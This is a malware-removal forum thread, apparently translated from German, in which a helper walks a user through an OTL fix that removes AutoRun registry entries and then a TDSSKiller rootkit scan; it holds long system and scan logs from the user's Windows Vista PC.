"{5E8F2ECF-06F7-423A-859B-1E8DC00370C0}" = protocol=6 | dir=in | app=%systemroot%\system32\p2phost.exe | 
"{69FD919F-0009-4345-A4DE-06E2DE399108}" = protocol=6 | dir=in | app=%programfiles%\windows collaboration\wincollab.exe | 
"{7500E32D-86F6-40A8-B76E-8EA19B7428E5}" = protocol=6 | dir=out | app=%programfiles%\windows collaboration\wincollab.exe | 
"{82930E01-7C8D-431C-AEC1-D6BE0F54D0B8}" = protocol=6 | dir=in | app=%programfiles%\windows collaboration\wincollab.exe | 
"{87C2F6AE-D78B-4BD0-AE32-7194A4E3156B}" = protocol=17 | dir=in | app=c:\program files\teamviewer\version8\teamviewer.exe | 
"{A5160E46-A4F1-4377-AF9D-96E5105C1C4F}" = protocol=17 | dir=out | app=%programfiles%\windows collaboration\wincollab.exe | 
"{AD06B8E8-7AF8-49A2-92B0-026E31DADE86}" = protocol=6 | dir=out | app=%programfiles%\windows collaboration\wincollab.exe | 
"{B63EB692-B61B-42F0-AABB-1B40B6DA6ACC}" = protocol=6 | dir=in | app=%systemroot%\system32\p2phost.exe | 
"{B8433C53-6A69-42E4-9740-C5A82EC8916D}" = protocol=6 | dir=in | app=c:\program files\pctv systems\tvcenter\tvcenter.exe | 
"{CBD98854-92C9-441E-9713-43D8CA89334E}" = protocol=6 | dir=in | app=c:\program files\teamviewer\version8\teamviewer.exe | 
"{CDEEC85A-3305-4435-995A-666F685CC843}" = protocol=17 | dir=in | app=c:\program files\teamviewer\version8\teamviewer_service.exe | 
"{D1D6CE0B-D6BF-4DBE-9823-CE0D8F65068C}" = protocol=17 | dir=in | app=%programfiles%\windows collaboration\wincollab.exe | 
"{D55642BE-5836-4CDB-8A16-0114F93FE5F2}" = protocol=17 | dir=in | app=c:\program files\pinnacle\shared files\programs\strmserver\strmserver.exe | 
"{E810B54B-4B65-4C78-9139-824738374694}" = protocol=17 | dir=in | app=%programfiles%\windows collaboration\wincollab.exe | 
"{EA478A72-42C6-49D7-95DB-358F57A8B512}" = protocol=6 | dir=in | app=c:\program files\teamviewer\version8\teamviewer_service.exe | 
"{EE5C1F2B-44D5-4BAE-BF32-6245683AA23D}" = protocol=6 | dir=in | app=c:\program files\bonjour\mdnsresponder.exe | 
"TCP Query User{54279280-8F23-4BA9-9E36-CE06ABB00513}C:\program files\mozilla thunderbird\thunderbird.exe" = protocol=6 | dir=in | app=c:\program files\mozilla thunderbird\thunderbird.exe | 
"TCP Query User{773BDB20-BBD6-46FE-B421-12DF0F9EF2F2}C:\xampp\apache\bin\httpd.exe" = protocol=6 | dir=in | app=c:\xampp\apache\bin\httpd.exe | 
"TCP Query User{94CA6C52-5629-408C-BE9A-81068EA0156B}C:\program files\mozilla firefox\firefox.exe" = protocol=6 | dir=in | app=c:\program files\mozilla firefox\firefox.exe | 
"TCP Query User{BB32885D-2FF9-4630-9D00-C7DFD9FC3786}C:\windows\explorer.exe" = protocol=6 | dir=in | app=c:\windows\explorer.exe | 
"TCP Query User{BEC3CAC1-2AF8-4A1D-977E-2E1A997B2D01}C:\program files\mozilla firefox\firefox.exe" = protocol=6 | dir=in | app=c:\program files\mozilla firefox\firefox.exe | 
"UDP Query User{39A00ACD-5B35-4DDC-AECB-265D1DC4A269}C:\program files\mozilla firefox\firefox.exe" = protocol=17 | dir=in | app=c:\program files\mozilla firefox\firefox.exe | 
"UDP Query User{5D8CA6A2-4222-48D2-AB6F-0C8AC40F1D85}C:\xampp\apache\bin\httpd.exe" = protocol=17 | dir=in | app=c:\xampp\apache\bin\httpd.exe | 
"UDP Query User{6DFB4226-425E-4206-A91E-9B0D975905E8}C:\windows\explorer.exe" = protocol=17 | dir=in | app=c:\windows\explorer.exe | 
"UDP Query User{84CBEA78-88A6-4423-8DF3-06BA1AACE776}C:\program files\mozilla firefox\firefox.exe" = protocol=17 | dir=in | app=c:\program files\mozilla firefox\firefox.exe | 
"UDP Query User{FE1B0B2D-DABC-4B72-9E1A-91993448416F}C:\program files\mozilla thunderbird\thunderbird.exe" = protocol=17 | dir=in | app=c:\program files\mozilla thunderbird\thunderbird.exe | 
 
========== HKEY_LOCAL_MACHINE Uninstall List ==========
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{00010407-78E1-11D2-B60F-006097C998E7}" = Microsoft Office 2000 Professional
"{02E89EFC-7B07-4D5A-AA03-9EC0902914EE}" = VC 9.0 Runtime
"{052FDD78-A6EA-3187-8386-C82F4CA3A929}" = Microsoft .NET Framework 3.5 Language Pack SP1 - deu
"{1061DF04-CF33-40B0-8360-D07C9BBEB122}" = HP Wireless Assistant
"{18D10072035C4515918F7E37EAFAACFC}" = AutoUpdate
"{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
"{26A24AE4-039D-4CA4-87B4-2F83216035FF}" = Java(TM) 6 Update 35
"{26A24AE4-039D-4CA4-87B4-2F83217010FF}" = Java 7 Update 10
"{3C3901C5-3455-3E0A-A214-0B093A5070A6}" = Microsoft .NET Framework 4 Client Profile
"{4286716B-1287-48E7-9078-3DC8248DBA96}" = OpenOffice.org 3.3
"{4A03706F-666A-4037-7777-5F2748764D10}" = Java Auto Updater
"{612C34C7-5E90-47D8-9B5C-0F717DD82726}" = swMSM
"{6AD9F5F3-5BD0-4000-BD9C-B536CF86D988}" = iTunes
"{6AFCA4E1-9B78-3640-8F72-A7BF33448200}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729
"{716E0306-8318-4364-8B8F-0CC4E9376BAC}" = MSXML 4.0 SP2 Parser and SDK
"{7299052b-02a4-4627-81f2-1818da5d550d}" = Microsoft Visual C++ 2005 Redistributable
"{7426D8C8-7323-4A3D-9F94-2465B95C26B5}" = TVCenter
"{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}" = Apple Software Update
"{79155F2B-9895-49D7-8612-D92580E0DE5B}" = Bonjour
"{7B63B2922B174135AFC0E1377DD81EC2}" = DivX Codec
"{837b34e3-7c30-493c-8f6a-2b0f04e2912c}" = Microsoft Visual C++ 2005 Redistributable
"{8F1ADE4D-EFAC-4F5A-B346-23C2687FAF50}" = Apple Mobile Device Support
"{9A25302D-30C0-39D9-BD6F-21E6EC160475}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
"{AC76BA86-7AD7-1031-7B44-AA1000000001}" = Adobe Reader X (10.1.4) - Deutsch
"{AF0CE7C0-A3E4-4D73-988B-B29187EC6E9A}" = QuickTime
"{B6CF2967-C81E-40C0-9815-C05774FEF120}" = Skype Toolbars
"{C8FD5BC1-92EF-4C15-92A9-F9AC7F61985F}" = HP Update
"{CAE7D1D9-3794-4169-B4DD-964ADBC534EE}" = HP Product Detection
"{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}" = Microsoft .NET Framework 3.5 SP1
"{D6F879CC-59D6-4D4B-AE9B-D761E48D25ED}" = Skype™ 5.3
"{D85FFE92-BF14-4E9B-BCCD-E5C16069E65F}_is1" = FireJump 1.0
"{DFAA3D2B-7087-464E-823B-738A23C29C27}" = Microsoft Visual J# 2.0 Redistributable Package - SE
"{F0A37341-D692-11D4-A984-009027EC0A9C}" = SoundMAX
"{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}" = Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219
"{F38ADCA4-AF7C-4C73-9021-6F1EA15D15EA}" = Pinnacle TVCenter Pro
"{F5266D28-E0B2-4130-BFC5-EE155AD514DC}" = Apple Application Support
"{F750C986-5310-3A5A-95F8-4EC71C8AC01C}" = Microsoft .NET Framework 4 Client Profile DEU Language Pack
"7-Zip" = 7-Zip 9.20
"Adobe Flash Player Plugin" = Adobe Flash Player 11 Plugin
"Adobe Shockwave Player" = Adobe Shockwave Player 11.6
"Agere Systems Soft Modem" = Agere Systems HDA Modem
"Avira AntiVir Desktop" = Avira Free Antivirus
"BabylonToolbar" = Babylon toolbar 
"Broadcom 802.11 Wireless LAN Adapter" = Broadcom 802.11 Wireless LAN Adapter
"BurnAware Free_is1" = BurnAware Free 5.2
"Der_Deploy_0" = Der Kleine Turnierplaner 7.1.4.1
"FileZilla Client" = FileZilla Client 3.6.0.2
"HDMI" = Intel(R) Graphics Media Accelerator Driver
"Hotspot_Shield Toolbar" = Hotspot Shield Toolbar
"HotspotShield" = Hotspot Shield 2.75
"InfraRecorder" = InfraRecorder
"LM98Free 2.2a_is1" = LM98Free 2.2a
"LuPO_is1" = LuPO 1.0.2.45
"Malwarebytes' Anti-Malware_is1" = Malwarebytes Anti-Malware Version 1.70.0.1100
"Marvell Miniport Driver" = Marvell Miniport Driver
"Microsoft .NET Framework 3.5 Language Pack SP1 - deu" = Microsoft .NET Framework 3.5 Language Pack SP1 - DEU
"Microsoft .NET Framework 3.5 SP1" = Microsoft .NET Framework 3.5 SP1
"Microsoft .NET Framework 4 Client Profile" = Microsoft .NET Framework 4 Client Profile
"Microsoft .NET Framework 4 Client Profile DEU Language Pack" = Microsoft .NET Framework 4 Client Profile DEU Language Pack
"Microsoft Visual J# 2.0 Redistributable Package - SE" = Microsoft Visual J# 2.0 Redistributable Package - SE
"Mozilla Firefox 18.0.2 (x86 de)" = Mozilla Firefox 18.0.2 (x86 de)
"Mozilla Thunderbird 17.0.2 (x86 de)" = Mozilla Thunderbird 17.0.2 (x86 de)
"MozillaMaintenanceService" = Mozilla Maintenance Service
"Mp3tag" = Mp3tag v2.49
"Notepad++" = Notepad++
"RocketDock_is1" = RocketDock 1.3.5
"Scribus 1.3.9" = Scribus 1.3.9
"SearchAnonymizer" = SearchAnonymizer
"SPG-Verein" = SPG-Verein
"SynTPDeinstKey" = Synaptics Pointing Device Driver
"TeamViewer 8" = TeamViewer 8
"Verbindungsassistent" = Verbindungsassistent
"VEREIN 2000" = 
"VLC media player" = VLC media player 1.1.10
"WinGimp-2.0_is1" = GIMP 2.6.11
"WinHTTrack Website Copier_is1" = WinHTTrack Website Copier 3.46-1
"XP Codec Pack" = XP Codec Pack
 
========== HKEY_CURRENT_USER Uninstall List ==========
 
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"CopyTrans Suite" = Nur Deinstallierung der CopyTrans Suite möglich.
 
========== Last 20 Event Log Errors ==========
 
[ Application Events ]
Error - 05.01.2013 06:28:25 | Computer Name = TuS-PC | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: m->NextScheduledEvent 2605
 
Error - 05.01.2013 06:28:25 | Computer Name = TuS-PC | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: m->NextScheduledSPRetry 2605
 
Error - 21.01.2013 06:02:55 | Computer Name = TuS-PC | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: Continuously busy for more than a second
 
Error - 21.01.2013 06:02:55 | Computer Name = TuS-PC | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: m->NextScheduledEvent 1326
 
Error - 21.01.2013 06:02:55 | Computer Name = TuS-PC | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: m->NextScheduledSPRetry 1326
 
Error - 29.01.2013 12:59:53 | Computer Name = TuS-PC | Source = Application Error | ID = 1000
Description = Fehlerhafte Anwendung iTunes.exe, Version 10.6.3.25, Zeitstempel 0x4fd16377,
 fehlerhaftes Modul ntdll.dll, Version 6.0.6002.18541, Zeitstempel 0x4ec3e3d5, Ausnahmecode
 0x80000003, Fehleroffset 0x0004878e,  Prozess-ID 0x15e0, Anwendungsstartzeit 01cdfe3c3bd13c94.
 
Error - 29.01.2013 13:00:01 | Computer Name = TuS-PC | Source = Application Error | ID = 1000
Description = Fehlerhafte Anwendung iTunes.exe, Version 10.6.3.25, Zeitstempel 0x4fd16377,
 fehlerhaftes Modul iTunes.dll, Version 10.6.3.25, Zeitstempel 0x4fd1634f, Ausnahmecode
 0xc0000005, Fehleroffset 0x007b1a62,  Prozess-ID 0x15e0, Anwendungsstartzeit 01cdfe3c3bd13c94.
 
Error - 29.01.2013 13:29:50 | Computer Name = TuS-PC | Source = Application Error | ID = 1000
Description = Fehlerhafte Anwendung iTunes.exe, Version 10.6.3.25, Zeitstempel 0x4fd16377,
 fehlerhaftes Modul JavaScriptCore.dll, Version 7536.27.1.1, Zeitstempel 0x506116fd,
 Ausnahmecode 0xc0000005, Fehleroffset 0x00116b2a,  Prozess-ID 0xf30, Anwendungsstartzeit
 01cdfe4215b9d7d0.
 
Error - 29.01.2013 13:30:42 | Computer Name = TuS-PC | Source = Application Hang | ID = 1002
Description = Programm iTunes.exe, Version 10.6.3.25 arbeitet nicht mehr mit Windows
 zusammen und wurde beendet. Überprüfen Sie den Problemverlauf im Applet "Lösungen
 für Probleme" in der Systemsteuerung, um nach weiteren Informationen über das Problem
 zu suchen.  Prozess-ID: f30  Anfangszeit: 01cdfe4215b9d7d0  Zeitpunkt der Beendigung:
 44
 
Error - 31.01.2013 19:03:24 | Computer Name = TuS-PC | Source = Windows Search Service | ID = 3013
Description = 
 
[ System Events ]
Error - 13.02.2013 10:38:53 | Computer Name = TuS-PC | Source = atapi | ID = 262155
Description = Der Treiber hat einen Controllerfehler auf \Device\Ide\IdePort0 gefunden.
 
Error - 13.02.2013 10:38:53 | Computer Name = TuS-PC | Source = atapi | ID = 262155
Description = Der Treiber hat einen Controllerfehler auf \Device\Ide\IdePort0 gefunden.
 
Error - 13.02.2013 10:38:53 | Computer Name = TuS-PC | Source = atapi | ID = 262155
Description = Der Treiber hat einen Controllerfehler auf \Device\Ide\IdePort0 gefunden.
 
Error - 13.02.2013 10:38:53 | Computer Name = TuS-PC | Source = atapi | ID = 262155
Description = Der Treiber hat einen Controllerfehler auf \Device\Ide\IdePort0 gefunden.
 
Error - 13.02.2013 10:38:53 | Computer Name = TuS-PC | Source = atapi | ID = 262155
Description = Der Treiber hat einen Controllerfehler auf \Device\Ide\IdePort0 gefunden.
 
Error - 13.02.2013 10:38:53 | Computer Name = TuS-PC | Source = atapi | ID = 262155
Description = Der Treiber hat einen Controllerfehler auf \Device\Ide\IdePort0 gefunden.
 
Error - 13.02.2013 10:38:53 | Computer Name = TuS-PC | Source = atapi | ID = 262155
Description = Der Treiber hat einen Controllerfehler auf \Device\Ide\IdePort0 gefunden.
 
Error - 13.02.2013 10:39:29 | Computer Name = TuS-PC | Source = volsnap | ID = 393230
Description = Die Schattenkopien von Volume "C:" wurden aufgrund eines E/A-Fehlers
 auf Volume "C:" abgebrochen.
 
Error - 13.02.2013 14:50:20 | Computer Name = TuS-PC | Source = DCOM | ID = 10010
Description = 
 
Error - 16.02.2013 16:22:22 | Computer Name = TuS-PC | Source = EventLog | ID = 6008
Description = Das System wurde zuvor am 16.02.2013 um 20:48:46 unerwartet heruntergefahren.
 
 
< End of report >
         
--- --- ---


Alt 19.02.2013, 00:07   #6
markusg
/// Malware-holic
 
Hi,
OTL fix

Fixing with OTL

  • Please start OTL.exe.
  • Now copy the contents of the code box into the text box.

Code:
ATTFilter
:OTL
O33 - MountPoints2\{000f3f6b-1350-11e1-bfdb-0022644e6fa0}\Shell - "" = AutoRun
O33 - MountPoints2\{000f3f6b-1350-11e1-bfdb-0022644e6fa0}\Shell\AutoRun\command - "" = G:\AutoRun.exe
O33 - MountPoints2\{000f3f8e-1350-11e1-bfdb-0022644e6fa0}\Shell - "" = AutoRun
O33 - MountPoints2\{000f3f8e-1350-11e1-bfdb-0022644e6fa0}\Shell\AutoRun\command - "" = G:\AutoRun.exe
O33 - MountPoints2\{1e273fd7-b186-11e1-ae3c-0022644e6fa0}\Shell - "" = AutoRun
O33 - MountPoints2\{1e273fd7-b186-11e1-ae3c-0022644e6fa0}\Shell\AutoRun\command - "" = H:\LaunchU3.exe -a
O33 - MountPoints2\{b11d1c81-a27f-11e0-9455-0022644e6fa0}\Shell - "" = AutoRun
O33 - MountPoints2\{b11d1c81-a27f-11e0-9455-0022644e6fa0}\Shell\AutoRun\command - "" = H:\LaunchU3.exe -a
:files
:Commands
[emptytemp]
         
  • If you have obscured your user name, e.g. with "*****", insert your real user name in the corresponding place. Otherwise the fix will not work.
  • Now please close all programs.
  • Now please click the Fix button.
  • OTL may ask for a restart. Please allow this.
  • After the restart you will find a text document on your desktop.
    (It can also be found under C:\_OTL\MovedFiles\<time_date>.txt)
    Now copy its contents here into your thread.

Alt 19.02.2013, 00:54   #7
martinbu
 
Done, see the contents of the file below. However, Avira is now deactivated!?

Quote:
All processes killed
========== OTL ==========
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{000f3f6b-1350-11e1-bfdb-0022644e6fa0}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{000f3f6b-1350-11e1-bfdb-0022644e6fa0}\ not found.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{000f3f6b-1350-11e1-bfdb-0022644e6fa0}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{000f3f6b-1350-11e1-bfdb-0022644e6fa0}\ not found.
File G:\AutoRun.exe not found.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{000f3f8e-1350-11e1-bfdb-0022644e6fa0}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{000f3f8e-1350-11e1-bfdb-0022644e6fa0}\ not found.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{000f3f8e-1350-11e1-bfdb-0022644e6fa0}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{000f3f8e-1350-11e1-bfdb-0022644e6fa0}\ not found.
File G:\AutoRun.exe not found.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{1e273fd7-b186-11e1-ae3c-0022644e6fa0}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1e273fd7-b186-11e1-ae3c-0022644e6fa0}\ not found.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{1e273fd7-b186-11e1-ae3c-0022644e6fa0}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1e273fd7-b186-11e1-ae3c-0022644e6fa0}\ not found.
File H:\LaunchU3.exe -a not found.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b11d1c81-a27f-11e0-9455-0022644e6fa0}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b11d1c81-a27f-11e0-9455-0022644e6fa0}\ not found.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b11d1c81-a27f-11e0-9455-0022644e6fa0}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b11d1c81-a27f-11e0-9455-0022644e6fa0}\ not found.
File H:\LaunchU3.exe -a not found.
========== FILES ==========
========== COMMANDS ==========

[EMPTYTEMP]

User: All Users

User: Default
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes

User: Default User
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes

User: Public

User: TuS
->Temp folder emptied: 31832 bytes
->Temporary Internet Files folder emptied: 33170 bytes
->Java cache emptied: 0 bytes
->FireFox cache emptied: 3695164 bytes
->Flash cache emptied: 492 bytes

%systemdrive% .tmp files removed: 0 bytes
%systemroot% .tmp files removed: 0 bytes
%systemroot%\System32 .tmp files removed: 0 bytes
%systemroot%\System32\drivers .tmp files removed: 0 bytes
Windows Temp folder emptied: 0 bytes
RecycleBin emptied: 4980084 bytes

Total Files Cleaned = 8,00 mb


OTL by OldTimer - Version 3.2.69.0 log created on 02192013_004642

Files\Folders moved on Reboot...

PendingFileRenameOperations files...

Registry entries deleted on Reboot...
Quote:
Quote from martinbu
Done, see the contents of the file below. However, Avira is now deactivated!?
As for Avira, the matter has resolved itself; after another restart it is running normally again.

Alt 19.02.2013, 12:51   #8
markusg
/// Malware-holic
 
Hi,
Please download TDSSKiller (TDSSKiller.exe) and save the file to your desktop.
  • Start TDSSKiller.exe and configure it as described in the TDSSKiller instructions.
  • Press Start Scan.
  • If infected objects are found, do not choose Cure under any circumstances. Choose Skip and click Continue.
    TDSSKiller will save a log file on your system drive (usually C:\).
    For example: C:\TDSSKiller.<version_date_time>log.txt
Please post the contents here in your thread in any case.

Alt 19.02.2013, 14:28   #9
martinbu
 
No infected files found; the log file is attached.

Quote:
14:26:10.0303 4252 TDSS rootkit removing tool 2.8.16.0 Feb 11 2013 18:50:42
14:26:10.0534 4252 ============================================================
14:26:10.0534 4252 Current date / time: 2013/02/19 14:26:10.0534
14:26:10.0534 4252 SystemInfo:
14:26:10.0534 4252
14:26:10.0534 4252 OS Version: 6.0.6002 ServicePack: 2.0
14:26:10.0534 4252 Product type: Workstation
14:26:10.0534 4252 ComputerName: TUS-PC
14:26:10.0535 4252 UserName: TuS
14:26:10.0535 4252 Windows directory: C:\Windows
14:26:10.0535 4252 System windows directory: C:\Windows
14:26:10.0535 4252 Processor architecture: Intel x86
14:26:10.0535 4252 Number of processors: 2
14:26:10.0535 4252 Page size: 0x1000
14:26:10.0535 4252 Boot type: Normal boot
14:26:10.0535 4252 ============================================================
14:26:12.0634 4252 Drive \Device\Harddisk0\DR0 - Size: 0x3A38B2E000 (232.89 Gb), SectorSize: 0x200, Cylinders: 0x76C1, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000050
14:26:12.0634 4252 Drive \Device\Harddisk1\DR1 - Size: 0x7470C06000 (465.76 Gb), SectorSize: 0x200, Cylinders: 0xED81, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'W'
14:26:12.0634 4252 Drive \Device\Harddisk2\DR2 - Size: 0x1D1C0F00000 (1863.01 Gb), SectorSize: 0x200, Cylinders: 0x3B601, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'W'
14:26:12.0634 4252 ============================================================
14:26:12.0634 4252 \Device\Harddisk0\DR0:
14:26:12.0634 4252 MBR partitions:
14:26:12.0634 4252 \Device\Harddisk0\DR0\Partition1: MBR, Type 0x7, StartLBA 0x3F, BlocksNum 0x1BDC3FC1
14:26:12.0634 4252 \Device\Harddisk0\DR0\Partition2: MBR, Type 0xC, StartLBA 0x1BDC4000, BlocksNum 0x200800
14:26:12.0634 4252 \Device\Harddisk0\DR0\Partition3: MBR, Type 0x7, StartLBA 0x1BFC4970, BlocksNum 0x1201000
14:26:12.0634 4252 \Device\Harddisk1\DR1:
14:26:12.0634 4252 MBR partitions:
14:26:12.0634 4252 \Device\Harddisk1\DR1\Partition1: MBR, Type 0xC, StartLBA 0x3F, BlocksNum 0x3A384C02
14:26:12.0634 4252 \Device\Harddisk2\DR2:
14:26:12.0634 4252 MBR partitions:
14:26:12.0634 4252 \Device\Harddisk2\DR2\Partition1: MBR, Type 0x7, StartLBA 0x800, BlocksNum 0xE8E07000
14:26:12.0634 4252 ============================================================
14:26:12.0665 4252 C: <-> \Device\Harddisk0\DR0\Partition1
14:26:12.0696 4252 D: <-> \Device\Harddisk0\DR0\Partition2
14:26:12.0821 4252 E: <-> \Device\Harddisk0\DR0\Partition3
14:26:12.0837 4252 G: <-> \Device\Harddisk2\DR2\Partition1
14:26:12.0837 4252 H: <-> \Device\Harddisk1\DR1\Partition1
14:26:12.0837 4252 ============================================================
14:26:12.0837 4252 Initialize success
14:26:12.0837 4252 ============================================================
14:26:33.0587 1440 ============================================================
14:26:33.0587 1440 Scan started
14:26:33.0587 1440 Mode: Manual;
14:26:33.0587 1440 ============================================================
14:26:34.0387 1440 ================ Scan system memory ========================
14:26:34.0387 1440 System memory - ok
14:26:34.0387 1440 ================ Scan services =============================
14:26:47.0717 1440 RasSstp - ok
14:26:47.0767 1440 [ B14C9D5B9ADD2F84F70570BBBFAA7935 ] rdbss C:\Windows\system32\DRIVERS\rdbss.sys
14:26:47.0797 1440 rdbss - ok
14:26:47.0817 1440 [ 89E59BE9A564262A3FB6C4F4F1CD9899 ] RDPCDD C:\Windows\system32\DRIVERS\RDPCDD.sys
14:26:47.0827 1440 RDPCDD - ok
14:26:47.0857 1440 [ E8BD98D46F2ED77132BA927FCCB47D8B ] rdpdr C:\Windows\system32\drivers\rdpdr.sys
14:26:47.0887 1440 rdpdr - ok
14:26:47.0897 1440 [ 9D91FE5286F748862ECFFA05F8A0710C ] RDPENCDD C:\Windows\system32\drivers\rdpencdd.sys
14:26:47.0967 1440 RDPENCDD - ok
14:26:48.0017 1440 [ C127EBD5AFAB31524662C48DFCEB773A ] RDPWD C:\Windows\system32\drivers\RDPWD.sys
14:26:48.0127 1440 RDPWD - ok
14:26:48.0237 1440 [ BCDD6B4804D06B1F7EBF29E53A57ECE9 ] RemoteAccess C:\Windows\System32\mprdim.dll
14:26:48.0277 1440 RemoteAccess - ok
14:26:48.0327 1440 [ 9E6894EA18DAFF37B63E1005F83AE4AB ] RemoteRegistry C:\Windows\system32\regsvc.dll
14:26:48.0377 1440 RemoteRegistry - ok
14:26:48.0427 1440 [ 6482707F9F4DA0ECBAB43B2E0398A101 ] RFCOMM C:\Windows\system32\DRIVERS\rfcomm.sys
14:26:48.0487 1440 RFCOMM - ok
14:26:48.0527 1440 [ 5123F83CBC4349D065534EEB6BBDC42B ] RpcLocator C:\Windows\system32\locator.exe
14:26:48.0557 1440 RpcLocator - ok
14:26:48.0667 1440 [ 3B5B4D53FEC14F7476CA29A20CC31AC9 ] RpcSs C:\Windows\system32\rpcss.dll
14:26:48.0667 1440 RpcSs - ok
14:26:48.0727 1440 [ 9C508F4074A39E8B4B31D27198146FAD ] rspndr C:\Windows\system32\DRIVERS\rspndr.sys
14:26:48.0767 1440 rspndr - ok
14:26:48.0787 1440 [ A3E186B4B935905B829219502557314E ] SamSs C:\Windows\system32\lsass.exe
14:26:48.0787 1440 SamSs - ok
14:26:48.0827 1440 [ 3CE8F073A557E172B330109436984E30 ] sbp2port C:\Windows\system32\drivers\sbp2port.sys
14:26:48.0867 1440 sbp2port - ok
14:26:48.0917 1440 [ 77B7A11A0C3D78D3386398FBBEA1B632 ] SCardSvr C:\Windows\System32\SCardSvr.dll
14:26:48.0957 1440 SCardSvr - ok
14:26:48.0997 1440 [ 1A58069DB21D05EB2AB58EE5753EBE8D ] Schedule C:\Windows\system32\schedsvc.dll
14:26:49.0017 1440 Schedule - ok
14:26:49.0027 1440 [ 312EC3E37A0A1F2006534913E37B4423 ] SCPolicySvc C:\Windows\System32\certprop.dll
14:26:49.0027 1440 SCPolicySvc - ok
14:26:49.0047 1440 [ 716313D9F6B0529D03F726D5AAF6F191 ] SDRSVC C:\Windows\System32\SDRSVC.dll
14:26:49.0057 1440 SDRSVC - ok
14:26:49.0087 1440 [ 90A3935D05B494A5A39D37E71F09A677 ] secdrv C:\Windows\system32\drivers\secdrv.sys
14:26:49.0107 1440 secdrv - ok
14:26:49.0127 1440 [ FD5199D4D8A521005E4B5EE7FE00FA9B ] seclogon C:\Windows\system32\seclogon.dll
14:26:49.0127 1440 seclogon - ok
14:26:49.0147 1440 [ A9BBAB5759771E523F55563D6CBE140F ] SENS C:\Windows\System32\sens.dll
14:26:49.0147 1440 SENS - ok
14:26:49.0157 1440 [ 68E44E331D46F0FB38F0863A84CD1A31 ] Serenum C:\Windows\system32\drivers\serenum.sys
14:26:49.0177 1440 Serenum - ok
14:26:49.0207 1440 [ C70D69A918B178D3C3B06339B40C2E1B ] Serial C:\Windows\system32\drivers\serial.sys
14:26:49.0207 1440 Serial - ok
14:26:49.0227 1440 [ 8AF3D28A879BF75DB53A0EE7A4289624 ] sermouse C:\Windows\system32\drivers\sermouse.sys
14:26:49.0247 1440 sermouse - ok
14:26:49.0287 1440 [ D2193326F729B163125610DBF3E17D57 ] SessionEnv C:\Windows\system32\sessenv.dll
14:26:49.0287 1440 SessionEnv - ok
14:26:49.0317 1440 [ 103B79418DA647736EE95645F305F68A ] sffdisk C:\Windows\system32\drivers\sffdisk.sys
14:26:49.0337 1440 sffdisk - ok
14:26:49.0357 1440 [ 8FD08A310645FE872EEEC6E08C6BF3EE ] sffp_mmc C:\Windows\system32\drivers\sffp_mmc.sys
14:26:49.0377 1440 sffp_mmc - ok
14:26:49.0397 1440 [ 9CFA05FCFCB7124E69CFC812B72F9614 ] sffp_sd C:\Windows\system32\drivers\sffp_sd.sys
14:26:49.0427 1440 sffp_sd - ok
14:26:49.0447 1440 [ 46ED8E91793B2E6F848015445A0AC188 ] sfloppy C:\Windows\system32\drivers\sfloppy.sys
14:26:49.0447 1440 sfloppy - ok
14:26:49.0467 1440 [ E1499BD0FF76B1B2FBBF1AF339D91165 ] SharedAccess C:\Windows\System32\ipnathlp.dll
14:26:49.0487 1440 SharedAccess - ok
14:26:49.0507 1440 [ C7230FBEE14437716701C15BE02C27B8 ] ShellHWDetection C:\Windows\System32\shsvcs.dll
14:26:49.0507 1440 ShellHWDetection - ok
14:26:49.0547 1440 [ D2A595D6EEBEEAF4334F8E50EFBC9931 ] sisagp C:\Windows\system32\drivers\sisagp.sys
14:26:49.0577 1440 sisagp - ok
14:26:49.0587 1440 [ CEDD6F4E7D84E9F98B34B3FE988373AA ] SiSRaid2 C:\Windows\system32\drivers\sisraid2.sys
14:26:49.0617 1440 SiSRaid2 - ok
